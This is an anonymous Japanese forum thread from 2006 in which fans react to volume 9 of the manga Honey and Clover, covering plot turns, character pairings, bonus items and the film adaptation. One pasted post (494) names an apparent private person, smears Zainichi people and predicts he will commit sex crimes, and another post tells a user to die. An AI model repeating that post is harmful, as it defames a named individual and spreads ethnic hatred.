修ははぐの前では紳士を貫き通すと思うし
はぐの心が他の男に向いてるとわかったら恋愛面からは潔く身を引きそうだ。

自分的にはたけのこの逆転ホームランに期待したい

416 :花と名無しさん:2006/07/14(金) 11:41:04 ID:???O
たけのこは何か突拍子のないパフォーマンスしなきゃダメだ電波の心つかむには。

417 :花と名無しさん:2006/07/14(金) 11:42:54 ID:???0
パフォーマンス…
自分探しはもう使ったし…
次は穴でも掘るか?

418 :花と名無しさん:2006/07/14(金) 11:46:21 ID:???0
たけのこはもうそっとしておいてやろう・・・
今更汚泥に引きずり込むこともあるまい

419 :花と名無しさん:2006/07/14(金) 11:49:43 ID:???O
でも作者に竹本を少しでも生かす意志があったなら、はぐの怪我以降はぐの心に響く言動をさせても不自然じゃなかった。

420 :花と名無しさん:2006/07/14(金) 11:54:35 ID:???0
おまいらこの漫画本当に好きなんですね

421 :花と名無しさん:2006/07/14(金) 11:59:40 ID:Cu6Fu3QsO
ああ好きさ!大好きさ!

422 :お犬様:2006/07/14(金) 12:14:24 ID:4fkv2WSsO
急に携帯からすんません、九巻買った方いらっしゃいます? 今本屋みてきたら売ってなくて…

423 :花と名無しさん:2006/07/14(金) 12:20:33 ID:???0
ここ読んでたから免疫できてたかと思ってたのに、
実際読むと9巻ってホント暗いね...
こんな性格のマンガだったっけ...?

424 :花と名無しさん:2006/07/14(金) 12:32:20 ID:???0
10巻では更なる衝撃が待ち受けています

425 :花と名無しさん:2006/07/14(金) 12:32:37 ID:jYWmJYLm0
そして10年後
竹本が誰かの娘の養育係に



そんなオチ予想

426 :花と名無しさん:2006/07/14(金) 12:36:34 ID:???0
>>423
こんな性格の漫画ですよ。1巻から既にモラトリアムの終焉に向かうことは示唆されてたし。
いつも何とはなしに一緒にいたみんなが、それぞれの道に旅立ち、離れ離れになっていく…
それがこの漫画のテーマの一つでしょうし。

竹本くんにとってのハッピーエンドは、誰かとくっついてどうこうという話でなく、
この5年間で人間的に成長して、自分の人生を自信をもって歩みだすことかと。

そいでもって、それちゃんと達成されたように思うよ。もうちょい駄目押しはあるかもしれが。


427 :花と名無しさん:2006/07/14(金) 12:37:47 ID:???0
唯一癒されたのが絵画教室のミニ真山(勝手に命名)がはぐの見舞いに来たイラストだった件について。

428 :花と名無しさん:2006/07/14(金) 12:40:08 ID:???0
>>425
竹本きゅんの10年後は、就職先でフツーに嫁さん見つけて、いいパパになって
いい家庭を築きましたとさ、みたいな感じだと思うよ。描写するかどうかはわからんが。

429 :花と名無しさん:2006/07/14(金) 12:46:09 ID:???0
9巻、
はぐの顔が冒頭から全然違ってたり、森田の過去が明かされたり
はぐ父の後妻(何も前振りなし)の話とか、
全部同時にぶちまけられて
読者にとっては唐突なイメージがあるというか。


430 :花と名無しさん:2006/07/14(金) 12:50:46 ID:???0
YYって休刊だったのか…
もう映画やアニメに合わせて店じまいしようって考えなのでは?

431 :花と名無しさん:2006/07/14(金) 12:59:11 ID:???0
>>342
ありがとうございます。



あれはやはり後妻なんですか。
はぐみ実母っていなかったんでしたっけ?
離婚?死別?

はぐみ親子の描写が少ないので設定が思い出せない。
どの辺で語られてましたっけ?

432 :花と名無しさん:2006/07/14(金) 13:07:09 ID:???O
>>422
え!無いの?、初回特典付いてるからかな?
おいらもまだ買ってないが夕方まであるかなぁ…

433 :花と名無しさん:2006/07/14(金) 13:07:43 ID:???0
俺の近所じゃコンビニで売っていたが

434 :花と名無しさん:2006/07/14(金) 13:12:51 ID:???0
>>431
YYに移った時に載った、ミドリちゃんのこれまでのハチクロ解説で
母は早くに亡くなった、と書いてあった。
本編では語られてなかった気がする。

435 :花と名無しさん:2006/07/14(金) 13:29:30 ID:???0
メガネの少年がお見舞いに来てる絵で泣けた

436 :花と名無しさん:2006/07/14(金) 13:32:24 ID:???0
過去ログ読むとたかだか野宮が山田に接近する程度で荒れているんだね…
あの頃は平和だったんだなと…

437 :花と名無しさん:2006/07/14(金) 13:42:19 ID:???0
アニメ版、初めて見た。
野宮の声がイメージと違った。

438 :花と名無しさん:2006/07/14(金) 13:44:18 ID:???0
はぐの人間的な魅力ってなんなんだ
才能とったら正直なにも魅力ない
性格もまともに描写されないし
人に依存しまくりだし
言動が消防並だし
倉持くんといたときだけやっと人間っぽかったけど
それも年齢差全く感じない幼稚ぶりだし
山田はどんどん肉饅頭みたいな顔になっていってるし恋愛ストーカーだし
なんだかなあ
平凡な女の子を魅力的に描写とかできない作家さんなのかな

439 :花と名無しさん:2006/07/14(金) 13:49:14 ID:???0
あのころは。。。

440 :花と名無しさん:2006/07/14(金) 13:50:45 ID:???O
ハーーッ!!

441 :花と名無しさん:2006/07/14(金) 13:50:59 ID:???0
>>432
9巻て初回特典とかあんの?

442 :花と名無しさん:2006/07/14(金) 13:51:21 ID:???0
は?

443 :花と名無しさん:2006/07/14(金) 13:52:41 ID:???0
ぽー

444 :花と名無しさん:2006/07/14(金) 13:54:02 ID:???0
かつては真山ドン引き状態だったのに、今の修があっさりその上を行ったのは圧巻だった。
実はこの作品、誰が一番気が狂っているかを推理するサイコサスペンスなのか?

445 :花と名無しさん:2006/07/14(金) 13:56:32 ID:???0
>>440
若かったー

446 :花と名無しさん:2006/07/14(金) 13:57:29 ID:???0
原田夫妻から疎外感を感じていた凡人修が
はぐの才能をつかって芸術の高みに・・・ってのが正しい見方なのかなー
それは「なんであいつはあんな絵をかいてる」って森田に詰め寄られたときに打ち消された選択肢だと思ってた。

447 :花と名無しさん:2006/07/14(金) 13:57:30 ID:???0
>>441
巻末にミドリちゃんのマグネットがついてたよ。
レジでファイル(うすいの)ももらった。

448 :花と名無しさん:2006/07/14(金) 13:59:49 ID:???0
もちっと丁寧に「はぐは故郷に帰って絵を描く選択肢が厳しくなった」説明をするべきだったな。

449 :441:2006/07/14(金) 14:00:14 ID:???0
>>447
そうなんですか。
どうもありがとう。

450 :花と名無しさん:2006/07/14(金) 14:00:41 ID:???0
特典がグッズだと「イラネ」だな。

初回版や限定版を買った読者だけが読める
描きおろし漫画本(鋼の錬金術士やげんしけんについてきたような本)
なら、欲しいけど…。

451 :花と名無しさん:2006/07/14(金) 14:05:02 ID:???0
>>450
確かにおまけは描き下ろし漫画とかの方が嬉しいね。
まあマグネットがついてても値段が上がってるわけじゃないから、くれるものは有り難くもらっておきますがね。

452 :花と名無しさん:2006/07/14(金) 14:06:39 ID:???O
別冊コーラス堺によると臭と竹本はイイ奴だけど退屈な奴・・えぐい言葉だ。

453 :花と名無しさん:2006/07/14(金) 14:08:12 ID:???0
そんな無茶な。あまりに基準が少女漫画してません?

454 :花と名無しさん:2006/07/14(金) 14:11:51 ID:???0
>>452
それ読んで私、あの俳優さんちょっと苦手になった。
自分が参加した映画のメインどころのキャラに対して
「退屈」なんてことば使わないで欲しかったなー。
「いわゆるイイヤツ」、くらいで十分意味は伝わるだろう。
退屈な男だと思いながら演じてたと思うとむかついてきた。
もともと貧相で好きじゃなかったけど。

455 :花と名無しさん:2006/07/14(金) 14:12:23 ID:???0
9巻読むと少し修を許せた。
はぐの芸術家としての葛藤を読み返したら
山田たちの愛なんてちっぽけに感じる。
ただ色ボケした修が蛇足。
あそこで青春スーツなければまだ良かったのに。

456 :花と名無しさん:2006/07/14(金) 14:14:31 ID:???0
はぐの決心は誰も非難してないと思う。
おっしゃる通りに頬赤らめる修が問題。
もし編集が安定していたら突っ込み入れて止めさせていたんだろうか?

457 :花と名無しさん:2006/07/14(金) 14:18:34 ID:???0
どこかの雑誌のインタブーで、ウミノタン「宝島の編集の
○○さんは凄く話をたくさんしてくれる人だけど集英社に
うつってからは担当がお話しするタイプじゃないから
ひとりでネームひねりだしてる」みたいに言ってた気がする。

458 :花と名無しさん:2006/07/14(金) 14:19:15 ID:???0
単行本派は9巻まで十分急展開なのにさらに10巻でひっくり変えるんだろうな…
まだ10巻最後で森田が光の方(はぐ)へ進むと信じてる。

459 :花と名無しさん:2006/07/14(金) 14:21:40 ID:???0
はぐって光なの?

460 :花と名無しさん:2006/07/14(金) 14:22:49 ID:???0
慣れない芝居で赤面になったとかじゃないのかなぁ
最後は決心のついた森田にはぐを託す臭
もともと恋愛感情はない、みたいな


無理だよな

461 :花と名無しさん:2006/07/14(金) 14:25:02 ID:???0
>>460
そうなったらそうなったで、何今更?抗議されてやっぱり軌道修正したの?って思うだろうなぁw

462 :花と名無しさん:2006/07/14(金) 14:25:13 ID:???0
無理がある


463 :花と名無しさん:2006/07/14(金) 14:30:24 ID:???0
もし最後の最後で倉持君が大逆転したら別の意味でチカを尊敬する。
でも何か地味に気に入っているっぽいんですけど。
こういう健気な男の子が好きなのかチカは。

464 :花と名無しさん:2006/07/14(金) 14:31:45 ID:???0
メガネならなんでもいいんだよ。
幸せを掴んだ野宮も真山もめがねだ。
修はメガネじゃないから最終的にはふられますね。つーかそうであれ。

465 :花と名無しさん:2006/07/14(金) 14:34:40 ID:???0
じゃあオサレチャンプと美和子も何とかしる。

466 :花と名無しさん:2006/07/14(金) 14:37:44 ID:???0
その2人はどっちもメガネだからなあ。
メガネパワーがフィフティーフィフティーなんだよ。
オサレの幸せが美和子さんとくっつくことでも
美和子が望んでないから打消し。

何漫画だこれ。

467 :花と名無しさん:2006/07/14(金) 14:38:53 ID:???0
メガネ×メガネは相性悪いのか。
メガテンの合体じゃあるまいし。

468 :花と名無しさん:2006/07/14(金) 14:40:01 ID:???0
なるほど、原田・リカ・修の3人暮らしで痴情のもつれがなかったのは
修がロリコンだったからかーーーーーーーー!
納得。

469 :花と名無しさん:2006/07/14(金) 14:42:48 ID:???0
>>468
そうかーーーーーーーーーッ!!
謎は解けたーーーーーーーーーッ!!
 
 
 
でもマジレスすると理花はロリ属性結構高いよね。
真山もお兄さん役だよねアレ。

470 :花と名無しさん:2006/07/14(金) 14:52:10 ID:???0
真山はお兄さん役か。
確かに途中からそんな感じになったよね。

471 :花と名無しさん:2006/07/14(金) 15:01:01 ID:???0
コミックス派です。今日買って来ますた。
山田さんが怪我したはぐへの思いで迷う?所で
野宮さんが「残らなきゃ」と言う所、すごいジーンと来た。
こういう所がこの漫画の好きな所だなー。
涙ぐんじゃったよ。

472 :花と名無しさん:2006/07/14(金) 15:01:01 ID:???0
あと何回何だろ。今連載中が3回先行だとして6回くらい?


473 :花と名無しさん:2006/07/14(金) 15:04:06 ID:???0
>>469
そうかも。
女子大生の頃のリカは
背が高くて容姿が大人っぽいだけで
性格は、なかなか人に心を開かないけど
心を開いた相手にはすごく甘ったれで
はぐみと性格が一緒だったし。

やっぱり、はぐみの性格が私はキッツイし嫌いだ。
はぐみが幼女みたいな容姿だから嫌いだと
最初は思ってたけど、はぐみが背が高くて
幼くない外見でもやっぱり嫌いだ。

その証拠に、幼稚化してきた山田もだんだん嫌いになってきた。

474 :花と名無しさん:2006/07/14(金) 15:07:41 ID:???0
10巻って来年かな?

475 :花と名無しさん:2006/07/14(金) 15:14:40 ID:???0
あまり話題に上ってないけど、真山の実家が姉三人と言う点、
奴の行動原理において実はかなり重要なポイントだと思う。
チカがそれを狙ってそう書いたのかは知らないが。

476 :花と名無しさん:2006/07/14(金) 15:15:53 ID:???0
そういや将棋する話って10巻に入るの?

477 :花と名無しさん:2006/07/14(金) 15:18:12 ID:???0
親の愛を受けてない(例:はぐみ、理科)と人見知りで甘ったれになり
親の愛を受けて育っても(例:山田)いつまでもだだをこねる甘ったれになるわけか。

この人は同人で男ばっかかいてたからまともな女描けないの?

478 :花と名無しさん:2006/07/14(金) 15:19:20 ID:???0
>>476
どこにも入んなくていいんですけどね


479 :花と名無しさん:2006/07/14(金) 15:26:31 ID:???0
堺の趣味が将棋だよね・・・

480 :花と名無しさん:2006/07/14(金) 15:28:41 ID:???0
ひぃーっ!

481 :花と名無しさん:2006/07/14(金) 15:42:29 ID:???0
過去ログはどうやって見れる?
コミックス派だから、過去ログ見直したい…

482 :花と名無しさん:2006/07/14(金) 15:45:20 ID:???0
保護者的立場から一転恋愛へっていうのは
ブラックジャックも同じだけど
むこうはゆるせるがこっちは許せない…。
なんでかな、血縁関係だから?

483 :花と名無しさん:2006/07/14(金) 15:46:34 ID:???0
ピノコには他に恋愛対象がないから。

484 :花と名無しさん:2006/07/14(金) 15:46:57 ID:???O
ウミノ→堺
FA?

485 :花と名無しさん:2006/07/14(金) 15:52:15 ID:???0
漫画の神様とくらべられても困る

>>484
FA!

486 :花と名無しさん:2006/07/14(金) 16:05:38 ID:???0
あれ、コーラスのバレどこだ?

487 :花と名無しさん:2006/07/14(金) 16:08:32 ID:FZicn4H6O
今日コミック発売?

488 :花と名無しさん:2006/07/14(金) 16:21:06 ID:???0
>487
9巻発売日だよ。

489 :花と名無しさん:2006/07/14(金) 16:23:48 ID:FZicn4H6O
ありがとう!(`・ω・´)
本屋に行ったらなくて、聞いてみたら「発売されてなみたいです」って言われた…。(´・ω・`)ショボン

490 :花と名無しさん:2006/07/14(金) 16:28:39 ID:???0
もう一軒いってみようか!(`・ω・´)

491 :花と名無しさん:2006/07/14(金) 16:29:02 ID:???O
9巻のあとがき、「ファー様に似ている」ってモテモテ王国のファー様?

492 :花と名無しさん:2006/07/14(金) 16:32:54 ID:???0
めっちゃ駅前の本屋の入り口前に積んでた件について

493 :花と名無しさん:2006/07/14(金) 16:32:56 ID:???0
いえいえ、私も朝、駅の本屋でGETしたんだけど、あと一冊だけだった。
他にも本屋はある!ガンガレ♪

494 :花と名無しさん:2006/07/14(金) 16:34:15 ID:???0
290 名前:名無しさん@お腹いっぱい。 :2006/02/27(月) 11:41:23

竹石圭佑って他人に色々迷惑かけてんだな。確かコイツの親は中国人だったろ。中学ん時に噂あった。
やっぱ在日って最低だ。近いうちテレビ報道されるような犯罪起こすんじゃないか?性犯罪とか

495 :花と名無しさん:2006/07/14(金) 16:34:42 ID:???0
そんなに売れてるのか。
10巻出たら一気にブクオフに流れるだろうから待とうかな。

496 :花と名無しさん:2006/07/14(金) 16:36:20 ID:???0
八巻までを、ヤフオクで高価落札した私は負け組…

497 :花と名無しさん:2006/07/14(金) 16:42:20 ID:???0
正直、ここ数ヶ月でハマって、凄く可愛い絵だし、切ないエピで大好きなマンガ2位に。

…しかし、臭とはぐ、になってきてから急激に冷めた。
ああ、最後に森田、かっさらってくれ〜鬱だわ。

498 :花と名無しさん:2006/07/14(金) 16:48:51 ID:???O
雨降ってきたしコンビニ売ってないし

499 :花と名無しさん:2006/07/14(金) 16:51:31 ID:???O
ものすごく暑いんですが
日射病になりそ(´・ω・`)

500 :花と名無しさん:2006/07/14(金) 16:52:24 ID:???0
森田×はぐ

が良かったなぁ・・・

501 :花と名無しさん:2006/07/14(金) 16:53:44 ID:???O
もりたぁ(゜´Д`゜)

502 :花と名無しさん:2006/07/14(金) 16:55:51 ID:???0
同じく!森田と共に…が希望。
どんでん返し、お願いウミノたん…(;´Д`)

503 :花と名無しさん:2006/07/14(金) 16:56:25 ID:???0
はぐにとって何が1番大切とか本能とか修の気持ちとか
もうよくわかったから、そんなのはもういいから
最後にもう1度森田さんに暴走してほしい。

504 :花と名無しさん:2006/07/14(金) 16:56:29 ID:???0
誰でもいいから伏線をひろってくっついて欲しかった。
いきなり修かよ。
ドッキリ大成功?

505 :花と名無しさん:2006/07/14(金) 16:57:23 ID:???0
臭、イラネ!!!!!

506 :花と名無しさん:2006/07/14(金) 16:57:35 ID:???0
森田がこれから後ギャグを言っても笑えないなこれ読むと。

507 :花と名無しさん:2006/07/14(金) 16:59:55 ID:???0
うんうん、白々しく感じる。
どう終わらせるんだ?急に重くなっちゃって☆

508 :花と名無しさん:2006/07/14(金) 17:00:52 ID:???O
9巻買った。

山崎が今日も絶望的デザインの服を見事に着こなしているのに感動した。
それにしても『ムシ』って…もはや意味不明だw

509 :花と名無しさん:2006/07/14(金) 17:02:19 ID:???0
せめて明るい未来を予感させる終わり方でありますように!

510 :花と名無しさん:2006/07/14(金) 17:04:55 ID:???0
9巻までに竹本も森田も山田も真山もそれぞれなんかしら決着つけてるから、
10巻ははぐパートってことか。
ケガを通して成長?

511 :花と名無しさん:2006/07/14(金) 17:05:36 ID:???0
過去スレより。
 
 
594 名前: 花と名無しさん 2005/08/23(火) 00:59:42 ID:???0

花本先生、真山、リカの3人
このまま何事も無く、真山リカで終わりまで
いくのだろうか…

何かあって欲しい。先生このままじゃ救われないヨ
 
 
これ書いた人は今何を思っているんだろう…

512 :花と名無しさん:2006/07/14(金) 17:07:20 ID:???0
ヨが気になる件

513 :花と名無しさん:2006/07/14(金) 17:13:13 ID:???0
確かに気になって仕方ないなw

514 :花と名無しさん:2006/07/14(金) 17:22:48 ID:???0
>>511
荒れて荒らして荒らして荒れてって感じでしょう☆

515 :花と名無しさん:2006/07/14(金) 17:23:03 ID:pHhT6Ze2O
既出だったらごめん。
映画の広告すごいな。
「片思いしてる人全てに、恋してる人全てに」。

おまけにはしっこに「結婚するなら竹本くんだよと中学生の子供に言いたい」(主婦43歳)

516 :花と名無しさん:2006/07/14(金) 17:26:54 ID:???0
>>515
久々に笑わしてもらった。


517 :花と名無しさん:2006/07/14(金) 17:35:19 ID:???0
映画の広告は試写会に来た人の使ってるみたいだよ。親子連れの人もいたし。
9巻買ってきて今読んだけど、すげー展開だなあ。
ウミノさん、掲載雑誌が廃刊になって無茶苦茶やってるって感じだあ。

518 :花と名無しさん:2006/07/14(金) 17:36:34 ID:???O
田舎は発売日に発売されないからツライ…。
森田×はぐだと信じてきたのに…orz

519 :花と名無しさん:2006/07/14(金) 17:46:43 ID:???0
森田はあんなに自分を晒してんのにはぐは…
必ず直すからっていうくらいなら森田と共に行けよ。
森田となら無限の箱をいくらでも開けられるだろうに。
っていうか修は自分がいて良い場所かわきまえろ
お前がいて良い場所じゃないだろ。

520 :花と名無しさん:2006/07/14(金) 17:54:24 ID:???0
はぐが修にすがるのはケガで気が動転してんのかと片付けていたが、
この、修の、対応は、これは一体・・・・

521 :花と名無しさん:2006/07/14(金) 17:58:37 ID:???0
>>479
え、将棋漫画の構想も
ウミノの堺萌えからきてるの???
ぐえー

ところで堺って既婚者だったっけ??


>>477
なるほど。
人見知りの甘ったれと
社交性のある甘ったれか。

522 :花と名無しさん:2006/07/14(金) 17:59:08 ID:FZicn4H6O
9巻買って来たよ!あったよー!(`・ω・´)
せつないねー!泣いちゃったよ(´・ω・`)早く続き見たいよ。

523 :花と名無しさん:2006/07/14(金) 17:59:20 ID:???0
8巻までだと修はぐもまぁ唐突だけどいっかって思ってたけど、
9巻読んだら森田とくっついて欲しくなった。

524 :花と名無しさん:2006/07/14(金) 17:59:45 ID:???0
>>481
ここから見れるよ。大量に過去ログあるから見るのも大変だけどガンバレ!
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%83n%83%60%83%7E%83c%82%C6%83N%83%8D%81%5B%83o%81%5B&sf=2&andor=AND&H=&view=table&all=on

525 :花と名無しさん:2006/07/14(金) 17:59:51 ID:???O
あれ 青森は明日かな?本屋いけなかったわ

526 :花と名無しさん:2006/07/14(金) 18:02:17 ID:???0
>>523
雑誌を立ち読みした人間から言わせてもらう。

10巻は読まないほうが幸せかも…

527 :481:2006/07/14(金) 18:07:19 ID:???0
>>524
ありがとう!!
読み返してきます…

528 :花と名無しさん:2006/07/14(金) 18:15:19 ID:FZicn4H6O
ネタバレ…
ありますか?!

529 :花と名無しさん:2006/07/14(金) 18:19:36 ID:???0
>>526
いや最後ルパンのごとく攫ってく森田に期待!

530 :花と名無しさん:2006/07/14(金) 18:28:32 ID:???0
>>521
趣味は読書と苔栽培。将棋は趣味と言うほどじゃないと思う。独身。

531 :花と名無しさん:2006/07/14(金) 18:32:34 ID:???0
ハチクロを立ち読みするの恥ずかしい(*´∀`*)

532 :花と名無しさん:2006/07/14(金) 18:38:17 ID:???0
chapter.57の扉いいね。オフィーリアはぐ、綺麗だ。

それにしても初回のマグネット、邪魔だなぁ。読みづらいよ。

533 :花と名無しさん:2006/07/14(金) 18:39:40 ID:???0
ウミノさんが堺と結婚したらワロス

昔、キャンディキャンディの漫画家のいがらしゆみこが
アニメキャンディキャンディのアンソニー役の声優と
結婚したのを思い出した(でもその後リコーンした)。

534 :花と名無しさん:2006/07/14(金) 18:44:10 ID:UnzALIEa0
少年漫画なら瀕死の後の主人公はとんでもない力を身につけてる

535 :花と名無しさん:2006/07/14(金) 18:58:25 ID:???0
映画版ではぐが普通の身長の子になったのは
はぐに似たイメージの低身長の子でオーディションしたら
ロリくさい映画になりそうだったから変えたとのことだが
羽海野さんは自分の漫画で
はぐを幼女のように描いたらロリくさい漫画になってしまって
キモイということに全く気が付かなかったのかなぁ。

536 :花と名無しさん:2006/07/14(金) 19:07:41 ID:???0
はぐ145センチもあるのか。同じ身長の友達いるけどあんなに小さく見えないよ。

はぐあぼーんフラグってないのかな。いっそのことそれで誰ともくっつかず、
3人の男の大事な思いでになるとか、そういう可能性は

537 :花と名無しさん:2006/07/14(金) 19:08:41 ID:???O
映画の主題歌がスピッツなのは、彼等が美大出身だから?

538 :花と名無しさん:2006/07/14(金) 19:27:12 ID:???0
あぼんして欲しいキャラと順番
はぐ>修>山田>竹本
竹本は不甲斐なさすぎなので次点にとしてランクイン。

539 :花と名無しさん:2006/07/14(金) 19:27:57 ID:???0
もうみんなうざいんだよこの世界の住人

540 :花と名無しさん:2006/07/14(金) 19:29:29 ID:???0
鹿男といいみちーといい堺といい
好きなものにはすごい猛攻撃ですね作者様

541 :花と名無しさん:2006/07/14(金) 19:30:52 ID:???0
修と真山が将棋してる話はどこいったんだろう?
あったよね、なんか最後にヤフオクかなんかで将棋用の時計買うとかって話。
真山の合コンお持ち帰りは山田の相談うけてたとかそういうのも。

既出だったらすまそ

542 :花と名無しさん:2006/07/14(金) 19:31:25 ID:???0
>>535
身長はともかく、
蒼井優は、はぐっぽい雰囲気は結構出せるような感じだ。
まあ、原作がこうなった以上、
映画はどうなってもいいというか、
むしろ、映画は別物としていいモノになってればいいなと思うだけだ。

543 :花と名無しさん:2006/07/14(金) 19:34:15 ID:???0
正直お勧めされて呼んだけど
キャラがみんなみたことある感じ
チャンプはスラ団の仙道だし
まんま綾波いるし

544 :花と名無しさん:2006/07/14(金) 19:38:11 ID:???0
>>457
遅レスごめん。
へーそうなんだ。じゃあもしかして前担当がかなり優秀な人だったのかな?
ウミノの欲望も話し合いで良コントロール…
担当に口出しされなくなったことで今まで保っていた箍が外れたんだろうか。

545 :花と名無しさん:2006/07/14(金) 19:48:07 ID:???O
君は死んだ方がいい

546 :花と名無しさん:2006/07/14(金) 19:48:49 ID:???0
森田の親父って生きてるの?もういないの?

547 :花と名無しさん:2006/07/14(金) 20:03:45 ID:???0
>>543
え、ウミノって仙道ファンだった?
フジマ&花形のファンだと思ってたけど。
やんちゃな小悪魔君タイプと、ムッツリメガネ君タイプ。

548 :花と名無しさん:2006/07/14(金) 20:08:47 ID:???0
>>544
宝島時代の担当との関係は、上から指示や指図するというよりも
ウミノさんと一緒に萌え話や妄想につきあってくれるような
仲間や相棒みたいな感じだったらしいよ。
担当さんとこのキャラは次はこうしたら面白いんじゃないかとか
こうなったら面白いと楽しく会話してるうちにストーリーができたとか。

集英社の担当は、もっと事務的、ビジネスライクだったと思われる。
まぁそれが当たり前なんだが。

549 :花と名無しさん:2006/07/14(金) 20:10:26 ID:???0
>>543
六太郎は清田っぽい

550 :花と名無しさん:2006/07/14(金) 20:14:47 ID:???0
>549
まんま神もいたよな

551 :花と名無しさん:2006/07/14(金) 20:15:52 ID:???0
海のさんの同人知ってる人に聞いたら途中から
やたら童顔になっていったたけのこはまんま同人の藤間らしい

552 :花と名無しさん:2006/07/14(金) 20:16:20 ID:???0
9巻読んだ。泣いてしまった…

553 :花と名無しさん:2006/07/14(金) 20:20:16 ID:???0
ネタバレが目に付きそうで怖くて調べられないから聞きたいんだけど
コーラスでは何話までやってますかい?

554 :花と名無しさん:2006/07/14(金) 20:29:40 ID:???0
>>553

コーラスでは63話まで。

というか 面白い人だあなたは。

555 :花と名無しさん:2006/07/14(金) 20:29:53 ID:???0
今出てる号で63話目

556 :花と名無しさん:2006/07/14(金) 20:32:25 ID:???0
ウミノのスラダン同人に詳しい人教えてください。
ウミノスラダンの誰がハチクロの誰のモデルとか、設定が似てるとか
ウミノスラダンの誰に絵が似てるとかわかりますか?

557 :花と名無しさん:2006/07/14(金) 20:34:09 ID:???0
>>547
むしろ、仙道に大して思い入れない方がパクりやすいでしょ。
あの頭だけで、随分キャラ立ってるしw
メガネ君は本当にすきなんだろうな…

558 :花と名無しさん:2006/07/14(金) 20:37:15 ID:???0
>>554-555
どうも、助かりました。

559 :花と名無しさん:2006/07/14(金) 20:50:18 ID:???0
最新巻読んだ

「終わりの始まりの幕がどーのこーの」のとこの演出、ちょっとワロスw
この漫画ってこんなノリだったっけwww

そして「あとがき」スゴス。
社会関係資本に魅せられた作者の自己表出がすさまじいw
で、やっぱこの人近所に住んでたんだ…orz

あとこの作者ドリフネタ好きだねぇ。

560 :花と名無しさん:2006/07/14(金) 20:59:03 ID:???0
ハチクロって演出過剰でたまに寒くなる

561 :花と名無しさん:2006/07/14(金) 21:00:40 ID:???0
そして脚本は穴だらけ…

562 :花と名無しさん:2006/07/14(金) 21:01:23 ID:???0
過剰ポエムのほうが寒すぎる・・・

563 :花と名無しさん:2006/07/14(金) 21:13:45 ID:???0
わかりますわかります

564 :花と名無しさん:2006/07/14(金) 21:27:08 ID:???O
同人といえば高村でもかなり熱心に活動してたのに
何でスラダンばっかりひきあいに出されるんだろうか

565 :花と名無しさん:2006/07/14(金) 21:30:01 ID:???0
>>559
『終わりの始まりの〜』って57話の表紙のだよね。
コーラスに新連載スタート1話目の。
あれって編集の人が付け加えるいつもの文章じゃなくって
作者によるモノローグだったんだね。

566 :花と名無しさん:2006/07/14(金) 21:35:44 ID:???0
>>564
スラダンの方が有名だから

567 :花と名無しさん:2006/07/14(金) 21:45:09 ID:???0
>>565
どうでも良いけど、「終わりの始まり」って
『封神演技』っていう少年漫画のラスト近くに使われた題名と一緒なのが気になる。
パクリとまでは言わないが、何か手垢の付いた表現だとは思う。

568 :花と名無しさん:2006/07/14(金) 21:49:07 ID:???0
逆に手垢付きすぎだから今更どうでも良い感じだが

569 :花と名無しさん:2006/07/14(金) 21:51:28 ID:???O
最新刊・・この一巻のこの森田の笑顔の無さはどうなんだ・・

570 :花と名無しさん:2006/07/14(金) 21:53:19 ID:9MJ0gBLv0
9巻読んで馨兄さんがすごく好きになった。
ざまあみろっって笑いながら泣き崩れる所で自分が泣いてしまった。
馨兄さん表紙に載ってもいいんじゃないか?って思ってしまう。

571 :花と名無しさん:2006/07/14(金) 21:55:24 ID:???0
どうでも良いが理花は綾波系キャラではあるが中身が綾波とは相当違うぞ。

572 :花と名無しさん:2006/07/14(金) 22:03:38 ID:???0
ふむふむ…それで?

573 :花と名無しさん:2006/07/14(金) 22:15:08 ID:???0
>>571
違いを考察して箇条書きにしてみて?


>>564
ウミノさん、商業誌で
レディジョーカー関連の仕事してたね。
http://www.google.com/search?num=50&hl=ja&inlang=ja&ie=Shift_JIS&c2coff=1&q=%89H%8AC%96%EC%81@%8D%82%91%BA%8CO&lr=lang_ja
>ワタシは高村薫のココ にハマッた!!
>「七つの大罪」で読み解く登場人物―羽海野チカがイラストを描く!


>>559
>社会関係資本に魅せられた作者の自己表出

コミックス私はまだ読んでないのでkwsk

574 :花と名無しさん:2006/07/14(金) 22:26:30 ID:???0
小鳥のスモックブラウス、はぐに似合いそう↓
ttp://page2.auctions.yahoo.co.jp/jp/auction/b67916807

575 :花と名無しさん:2006/07/14(金) 22:27:33 ID:???0
はぐがケガしたのは、
ウミノが頭に包帯を巻いた幼女を描きたかったってだけなんじゃなかろうか・・・

そして森田兄弟がどっちもネコムスメみたいな顔になっててコエェヨ

ノリが違いすぎて、なんかハチクロの同人を読んだ気分。

576 :花と名無しさん:2006/07/14(金) 22:29:57 ID:???0
>>546
森田の両親、私も気になった。
でもこの作者のことだから書かずにごまかしそう。

577 :花と名無しさん:2006/07/14(金) 22:31:10 ID:???0
大人しそうに見えて実は我が強くて黒い願望を持っている意味ではユイに近いのでは?>リカ

578 :花と名無しさん:2006/07/14(金) 22:31:39 ID:???0
9巻の裏表紙は誰だったの?

579 :花と名無しさん:2006/07/14(金) 22:33:02 ID:???0
はぐみと犬達

580 :花と名無しさん:2006/07/14(金) 22:35:53 ID:???0
>>576
カオルが「最期まで」って言ってるから父親は確実に死んでるね。

581 :花と名無しさん:2006/07/14(金) 22:36:54 ID:???0
竹本のこと
わすれないでくださいね

582 :花と名無しさん:2006/07/14(金) 22:37:45 ID:???0
森田親父は生きていたら止めるだろうからなぁ復讐。

583 :花と名無しさん:2006/07/14(金) 22:43:03 ID:???0
竹本はもう無理だわ

584 :花と名無しさん:2006/07/14(金) 22:43:03 ID:???O
九巻読んでたまげた。はぐみの顔つきまったく変わってる…

585 :バレ有り:2006/07/14(金) 22:48:50 ID:???0
>>584
まったく同じ事思った。

ってか展開がすごい。「修ちゃん一緒に居て下さい」?とか書いてたモノローグがサブい
竹本が既に察してはぐにツッコミ入れてるしw これはさすがにありえないだろ
10巻出るまで売るの待とうと思ってたけど限界 オク出し決定

586 :花と名無しさん:2006/07/14(金) 22:48:52 ID:???0
9巻の最初の話で竹本が運転免許を取って、
その免許証が書かれてるページ(「ドライブ行こう!!」とか言ってる
ページ)で臭が持ってるマグカップが
「I v HG」って柄なんだけど、よく見ると
HとGの間にAが、Gの後ろにUが書いてあって…
   I v H  A  G U
ってなってる…。

これって雑誌掲載の時からだっけ?
もしそうでも当時は「親馬鹿ね…フフフ」と思えたけど、
今では…。

587 :花と名無しさん:2006/07/14(金) 22:49:58 ID:???0
みんなは森田の過去を知らないで
ただの金に汚い人だと思ってるんだよね…。

